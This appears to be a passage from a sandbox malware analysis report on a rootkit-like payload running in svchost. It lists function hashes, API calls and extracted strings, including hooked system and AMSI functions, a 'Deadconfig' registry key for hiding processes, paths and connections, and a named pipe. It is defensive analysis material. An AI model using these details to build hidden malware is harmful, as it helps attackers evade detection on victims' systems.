                                                        Similarity
                                                        • API ID: CloseOpen$Heap$AllocProcessSleep
                                                        • String ID:
                                                        • API String ID: 948135145-0
                                                        • Opcode ID: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction ID: 0d3e147137cf3f0668c5a4da59198925d64eba4c138aa6f11c5b45df95f9dcb5
                                                        • Opcode Fuzzy Hash: 64999c0117d7972c63d36e484e4b5c22b997d5fb2e44b7ed48be0e5086276bc0
                                                        • Instruction Fuzzy Hash: 95210171B00A0583FB509B23DD4D26963FCAB46FDEF0C54259E0BA7695EF2CC4598292

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction ID: e7c9d3b0f679888c4af4c039d51f87680f2cc789bfb9356e6c215fb0d25bdc0a
                                                        • Opcode Fuzzy Hash: ead5fadb83694ce98b6326e54bc9fbf3eb966a3b9ea24560d629fcd35623205e
                                                        • Instruction Fuzzy Hash: B0316D72B05B8086EB60DF60E8583DE73A8F789B54F48442ADA4E57B94DF38C54CC705
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 1239891234-0
                                                        • Opcode ID: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction ID: 9131fd5dbed5217045310b543fde8888276b45c687cb48d7a868e4cff48b437e
                                                        • Opcode Fuzzy Hash: e0d741da526e6e52bfddd8974ed83ffa82d96d60d1008cadd4c23b489aa9e4de
                                                        • Instruction Fuzzy Hash: 9D317136714B8086DB60CF25E8497DE73A8F789B64F580125EA8E57B68DF3CC149CB41
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite$ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 1443284424-0
                                                        • Opcode ID: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction ID: 74319de8a1f99e33c52a597bb1e6d03644dc4a4b130be96bf2fcd7b27b9672aa
                                                        • Opcode Fuzzy Hash: fb55a000834c869af8142d397673ad88ba24b52852e229f6c97767c338bfc2c2
                                                        • Instruction Fuzzy Hash: 8BE1D062B14A808BE700CF64D48D2DD7BB5F346B98F188116DE5BA7B99DF38C42AC741
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: *?$HIJKLMNOPQRSTUVWXYZ
                                                        • API String ID: 3215553584-1407779936
                                                        • Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction ID: cabe4086090de5c02c394298dc0c680afb927707af4e912d7e18d9f79e66943a
                                                        • Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
                                                        • Instruction Fuzzy Hash: 2551AE62F1069486EF14CBA6D82C6AD27ADBB5AFD4F888525DE1907B85DF3CC0898301

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                        • String ID: SOFTWARE\Deadconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                        • API String ID: 2135414181-3864762265
                                                        • Opcode ID: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction ID: 60ad0d1acc99e365d96b378d3b39321a142c500dcbb11651cc49b0a11ce34215
                                                        • Opcode Fuzzy Hash: f4bb390ec195533d0d08c97f362a19cf980481d45eb9fb13aebdfbbaa82a3014
                                                        • Instruction Fuzzy Hash: 8371F536B10A5086EB10DF65E88D69937B8FB8AF9DF081111DE4F67B28DF28C549C341

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentThread.KERNEL32 ref: 000002A661301D47
                                                          • Part of subcall function 000002A6613020C0: GetModuleHandleA.KERNEL32(?,?,?,000002A661301D79), ref: 000002A6613020D8
                                                          • Part of subcall function 000002A6613020C0: GetProcAddress.KERNEL32(?,?,?,000002A661301D79), ref: 000002A6613020E9
                                                          • Part of subcall function 000002A661305F50: GetCurrentThreadId.KERNEL32 ref: 000002A661305F8B
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                        • API String ID: 4175298099-4225371247
                                                        • Opcode ID: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction ID: b3fabe37c4680668d1ae011a90c989e86a7bf41738fed13202891c8a3ce4ee20
                                                        • Opcode Fuzzy Hash: 4705abceb593070c5488a5deecb4e4079e35b8c621484f12281ef43e977e1bc4
                                                        • Instruction Fuzzy Hash: E44187A5B10A8AA2FA05DB65ED5E7D4336EA706F46F8C4023940B27575DF3C828DC393

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction ID: f5c37a36ef25a3a88bd1a4a094d32cd22919e670b9c6443afd41ee3b8fcd4d68
                                                        • Opcode Fuzzy Hash: d31796d830b779bd35019739cbc6c4046c19c366aaa5f759b56b231691e58326
                                                        • Instruction Fuzzy Hash: EB512832B10B8487EB14DF62E44D35AB7B5F78AF99F084124DA4A27768DF3CC0498741
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000003.1781874450.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_3_2a6612d0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID: bad array new length
                                                        • API String ID: 190073905-1242854226
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 66319a59e465040172f2708f6662c54a8d1af914a7905c09fce3c1ffde232696
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 8E81AC61F006C18BFA64AB76E88D399269DAF87F84F4C4115EA4943796DF3CC9CD8302

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Running Time
                                                        • API String ID: 1943346504-1805530042
                                                        • Opcode ID: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction ID: d600d0342521e5dc14df8aff5c13f6e4325c40e3bdc537f4051cfcbd9786d19f
                                                        • Opcode Fuzzy Hash: 4320c3d255521c8809fbccc0c000ef70dc88065294953a5bba07585d713a8765
                                                        • Instruction Fuzzy Hash: 2D318222F00A419BE711DF22A80C75AB3A8FB89F96F484525DE4B63724DF3CC45E8781

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$CounterInfoProcess$AllocFree
                                                        • String ID: \GPU Engine(*)\Utilization Percentage
                                                        • API String ID: 1943346504-3507739905
                                                        • Opcode ID: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction ID: fe809002958c5b70657823c4d9fc4eb754dddcf7c3a06f73e309caee62860b1d
                                                        • Opcode Fuzzy Hash: a2f2b6270209c0617fffbf8088b8af58c514d563d63196d61a77ac5b37470c57
                                                        • Instruction Fuzzy Hash: F5316D21B10B418BE754EF66A84CB5A73F9FB8AF96F084125DE4B63724DF3CC40A8641

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: AddressHandleModuleProclstrlen
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 3607816002-3850299575
                                                        • Opcode ID: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction ID: a387560ea905659ccb8272e6c85d93e934b63f6a9fc372877915c3c60fa115c0
                                                        • Opcode Fuzzy Hash: 280e74d68912d67f2de1be9a053b4f09130ab35bfe7264d0fa8680fff1539601
                                                        • Instruction Fuzzy Hash: 00A18C32B00A8187EB588F25D60C69973E9F746F99F584026DE4E67B98DF38CC49C381

                                                        Control-flow Graph

                                                        Control-flow graph for the function at 2a66130104c (rendered graph omitted); its nodes call RegQueryInfoKeyW, RegEnumValueW, GetProcessHeap, HeapAlloc and HeapFree.
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
                                                        • Opcode ID: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction ID: af04300308808e81b21d15fd87a1c889461f9cd28fcb8d9089a114049921a180
                                                        • Opcode Fuzzy Hash: cdead5c203d895dcd3ca28035d3c1357740cab67237a15052ecca15c34582b89
                                                        • Instruction Fuzzy Hash: 6B415C32714B8087E764CF62E44839A77B5F38AB99F488129DA8A17B58DF3CC549CB41

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
                                                        • String ID: \\.\pipe\Deadchildproc
                                                        • API String ID: 166002920-2259481039
                                                        • Opcode ID: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction ID: 900f71070070d9abe1b8849eb5d46759e6146ce4ce717753c2b0b13c55d548f7
                                                        • Opcode Fuzzy Hash: 1005d7d54db17bd1b4de57f7c8175984e9a9ac4fa96f888e605f87ef2211e3c7
                                                        • Instruction Fuzzy Hash: 7911F636A14B8083E710CB21F54D35A77A4F78AFA5F584215EA9B17AA8CF7CC14DCB42

                                                        Control-flow Graph

                                                        Control-flow graph for the function at 2a661307930 (rendered graph omitted); its nodes call __scrt_dllmain_crt_thread_attach and __scrt_dllmain_after_initialize_c, plus internal subroutines in the 2a661307e2c-2a661309dfc range.
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                        • String ID:
                                                        • API String ID: 190073905-0
                                                        • Opcode ID: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction ID: 2cfcdc948a9de1d10b6df2867afef34899f3b6667a05ece3429fded038ae8830
                                                        • Opcode Fuzzy Hash: 7ac826a7eb3537126ab8904f743de0d1d5af83f297bd596e103e72928a1e623e
                                                        • Instruction Fuzzy Hash: 0E810221F0064187FA50EB65984E39922DCAB87F82F0C4425DA8B77796DF3CC94E8383

                                                        Control-flow Graph

                                                        Control-flow graph for the function at 2a661309930 (rendered graph omitted); its nodes call LoadLibraryExW, GetLastError, GetProcAddress and FreeLibrary.
                                                        APIs
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A6613099B5
                                                        • GetLastError.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A6613099C3
                                                        • LoadLibraryExW.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A6613099ED
                                                        • FreeLibrary.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A661309A33
                                                        • GetProcAddress.KERNEL32(?,?,?,000002A661309AEF,?,?,?,000002A6613098B4,?,?,?,?,000002A6613094A5), ref: 000002A661309A3F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Library$Load$AddressErrorFreeLastProc
                                                        • String ID: api-ms-
                                                        • API String ID: 2559590344-2084034818
                                                        • Opcode ID: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction ID: f0791b96ef91c1d198ed1d9129c3e51a47dbba9e60560fbbe84c9b6c10888074
                                                        • Opcode Fuzzy Hash: af1dc5fe93b083055cd8c5ce044ece591eb4d9ced34ab9dbf74db6faff57ed03
                                                        • Instruction Fuzzy Hash: 02319021B1264092FE15DF06A80C79962DCB74AFA5F5D4525DD2F67390DF3CC4898382

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                        • String ID: CONOUT$
                                                        • API String ID: 3230265001-3130406586
                                                        • Opcode ID: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction ID: 4d15754415cb6b26f3af690b2db3d5ac8b0ed21cde72321f032982f121a3ca1e
                                                        • Opcode Fuzzy Hash: ef389f1408fdc57218b3d17a10d8552332256b0ab613155e2b85b84f861b2611
                                                        • Instruction Fuzzy Hash: DA114931B14A4087E7509B52A84E31976A9B79AFE4F484225EA5F977A4CF7CC8088741
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Thread$Current$Context
                                                        • String ID:
                                                        • API String ID: 1666949209-0
                                                        • Opcode ID: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction ID: d3911cc119219c1cc973d9d01e034cee812cdfb5a5aa00d1aae4b005dd0a6e37
                                                        • Opcode Fuzzy Hash: d6438e14acddd0a34d7f097f3268bd65991f16ef90fc5aeffdae397213171ed3
                                                        • Instruction Fuzzy Hash: DAD1AB76608B8882EA70DB0AE49935A77E4F3C9F85F140116EACE57BA9CF3CC545CB41
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID: Dead
                                                        • API String ID: 756756679-1293411866
                                                        • Opcode ID: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction ID: 4dd6e9819385993a33c4928075c13d7e72d6ff784883d3569d8b25ec7c09e6e3
                                                        • Opcode Fuzzy Hash: 16deceebbb86a4ee17dd3b940be503c67630b0e40e640d710b58a96d17f55941
                                                        • Instruction Fuzzy Hash: DE31AF21B01B5187EA51DF56E44C769A7E8FB56F91F0C80209E8A23B54EF3CD4A9C781
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 0000000E.00000002.2968922612.000002A661301000.00000020.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                        • Associated: 0000000E.00000002.2967816934.000002A661300000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2970326753.000002A661313000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2971491152.000002A66131D000.00000004.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2972526658.000002A66131F000.00000002.00000001.00020000.00000000.sdmp
                                                        • Associated: 0000000E.00000002.2973592972.000002A661325000.00000002.00000001.00020000.00000000.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_14_2_2a661300000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                        • String ID:
                                                        • API String ID: 517849248-0
                                                        • Opcode ID: 16d258a9ac026dd37d62bcd9d6c3911ef3c0b7ca7915ee34a9afe05dd31b2e3e
                                                        • Instruction ID: e1dd1258c5261a04da8618229e7ec079af13366636c2869e31bd1f927bcd4418
